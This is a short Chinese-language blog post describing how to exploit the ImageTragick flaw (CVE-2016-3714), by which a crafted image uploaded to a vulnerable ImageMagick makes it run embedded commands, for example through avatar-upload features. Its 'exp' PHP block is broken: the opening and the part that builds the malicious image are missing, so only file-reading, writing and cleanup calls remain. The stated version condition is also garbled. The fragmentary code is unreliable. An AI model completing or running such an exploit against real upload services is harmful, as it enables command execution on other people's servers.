## 利用 ImageMagick 漏洞绕过(一)
**1.利用条件**
Imagick = 5.4
**2.基本原理**
ImageTragick(CVE-2016-3714)
漏洞的利用过程非常简单,只要将精心构造的图片上传至使用漏洞版本的ImageMagick,ImageMagick会自动对其格式进行转换,转换过程中就会执行攻击者插入在图片中的命令。因此很多具有头像上传、图片转换、图片编辑等具备图片上传功能的网站都可能会中招。
**3.exp**
“`php
readImage(‘KKKK.mvg’);
$thumb->writeImage(‘KKKK.png’);
$thumb->clear();
$thumb->destroy();
unlink(“KKKK.mvg”);
unlink(“KKKK.png”);
?>
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容